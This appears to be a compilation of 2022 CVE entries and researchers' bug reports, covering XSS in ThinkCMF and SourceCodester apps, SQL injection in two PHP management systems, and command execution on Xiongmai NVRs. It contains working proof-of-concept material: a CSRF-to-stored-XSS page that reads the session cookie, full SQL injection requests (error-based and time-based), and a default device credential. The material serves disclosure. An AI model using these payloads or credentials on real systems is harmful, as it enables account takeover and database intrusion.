A vulnerability was found in Movie Ticket Booking System and classified as problematic. Affected by this issue is some unknown functionality of the file editBooking.php. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214628.

CVE-2022-4251

A vulnerability was found in SourceCodester Canteen Management System. It has been declared as problematic. This vulnerability affects the function builtin_echo of the file customer.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-214630 is the identifier assigned to this vulnerability.

CVE-2022-4253

Multiple Xiongmai NVR devices, including MBD6304T V4.02.R11.00000117.10001.131900.00000 and NBD6808T-PL V4.02.R11.C7431119.12001.130000.00000, allow authenticated users to execute arbitrary commands as root, as exploited in the wild starting in approximately 2019. A remote and authenticated attacker, possibly using the default admin:tlJwpbo6 credentials, can connect to port 34567 and execute arbitrary operating system commands via a crafted JSON file during an upgrade request. Since at least 2021, Xiongmai has applied patches to prevent attackers from using this mechanism to execute telnetd.

CVE-2022-45045: Xiongmai IoT Exploitation - Blog - VulnCheck

ThinkCMF version 6.0.7 is affected by Stored Cross-Site Scripting (XSS). An attacker who successfully exploited this vulnerability could inject a Persistent XSS payload in the Slideshow Management section that execute arbitrary JavaScript code on the client side, e.g., to steal the administrator's PHP session token (PHPSESSID).

ThinkCMF version 6.0.7 is vulnerable to Stored Cross-Site Scripting. More precisely, the component that manages the slideshows allows you to insert HTML tags and JavaScript code in the Name field.

Here are the steps to reproduce the issue.

Note that with this issue a remote user can steal the administrator's session cookie (PHPSESSID).

These are the PoCs I used.

    <html>
      <body>
      <h1>CSRF - XSS Stored PoC</h1>
      <script>history.pushState('', '', '/')</script>
        <form action="http://localhost/admin/slide/addPost.html" method="POST">
          <input type="hidden" name="name" value="&lt;audio&#47;src&#47;onerror&#61;alert&#40;0&#41;&gt;" />
          <input type="hidden" name="remark" value="XSS&#32;Stored" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          //document.forms[0].submit();
        </script>
      </body>
    </html>
    

    <html>
      <body>
      <h1>CSRF - XSS Stored PoC</h1>
      <script>history.pushState('', '', '/')</script>
        <form action="http://localhost/admin/slide/addPost.html" method="POST">
          <input type="hidden" name="name" value="&lt;audio&#47;src&#47;onerror&#61;alert&#40;document.cookie&#41;&gt;" />
          <input type="hidden" name="remark" value="XSS&#32;Stored" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          //document.forms[0].submit();
        </script>
      </body>
    </html>
    

  
_Fig. 1: CSRF that contains an XSS payload_

  
_Fig.2: CSRF payload triggered_

  
_Fig. 3: XSS payload injected_

  
_Fig. 4: XSS triggered_

  
_Fig. 5: Reading the PHPSESSID cookie_

CVE-2022-40849: XSS Stored in the Slideshow Management component. · Issue #737 · thinkcmf/thinkcmf

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=services/manage_service&id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Distance

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/?page=services/manage\_service&id=

Vulnerability location: /php-sms/admin/?page=services/manage\_service&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=services/manage\_service&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=services/manage\_service&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44294: bug_report/SQLi-3.md at main · Distance10086/bug_report

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/quotes/manage_remark.php?id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Distance

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/quotes/manage\_remark.php?id=

Vulnerability location: /php-sms/admin/quotes/manage\_remark.php?id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/quotes/manage\_remark.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/quotes/manage\_remark.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44296: bug_report/SQLi-2.md at main · Distance10086/bug_report

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/orders/assign_team.php?id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Distance

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/orders/assign\_team.php?id=

Vulnerability location: /php-sms/admin/orders/assign\_team.php?id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/orders/assign\_team.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/orders/assign\_team.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44295: bug_report/SQLi-1.md at main · Distance10086/bug_report

Simple Inventory Management System v1.0 is vulnerable to SQL Injection via /ims/login.php.

**Simple Inventory Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: li-baige

vendors:https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html

Vulnerability File: /ims/login.php

Parameter "email" (POST), exists SQL injection vulnerability

Payload1: email=a'&pwd=b&login=

    POST /ims/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=3gtl0ab587o41bs2nnm02st0ve
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/ims/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 21
    
    email=a'&pwd=b&login=
    

In response to an error

Payload2: email=a''&pwd=b&login=

    POST /ims/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=3gtl0ab587o41bs2nnm02st0ve
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/ims/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 22
    
    email=a''&pwd=b&login=
    

In response to the right

Payload3: email=a'%2b(select\*from(select(sleep(20)))a)%2b'&pwd=b&login=

    POST /ims/login.php HTTP/1.1
    Host: localhost
    Origin: http://localhost
    Cookie: PHPSESSID=3gtl0ab587o41bs2nnm02st0ve
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Upgrade-Insecure-Requests: 1
    Referer: http://localhost/ims/login.php
    Content-Type: application/x-www-form-urlencoded
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Content-Length: 61
    
    email=a'%2b(select*from(select(sleep(20)))a)%2b'&pwd=b&login=
    

Response time is 20 seconds

CVE-2022-44151: bug_report/SQLi-1.md at main · li-baige/bug_report

A vulnerability was found in SourceCodester Canteen Management System. It has been rated as problematic. This issue affects the function builtin_echo of the file youthappam/brand.php. The manipulation of the argument brand_name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214595.

CVE-2022-4234

Zenario CMS 9.3.57186 is vulnerable to Remote Code Excution (RCE).

Download: zenario-probusiness-9.3.57186.zip

I found a bug very critical in Zenar CMS version 9.3.

Below are steps to reproduce the bug

1.  Create file shell php

1.  Check shell

**If you have any questions, please feel free to ask.**

Tag

#php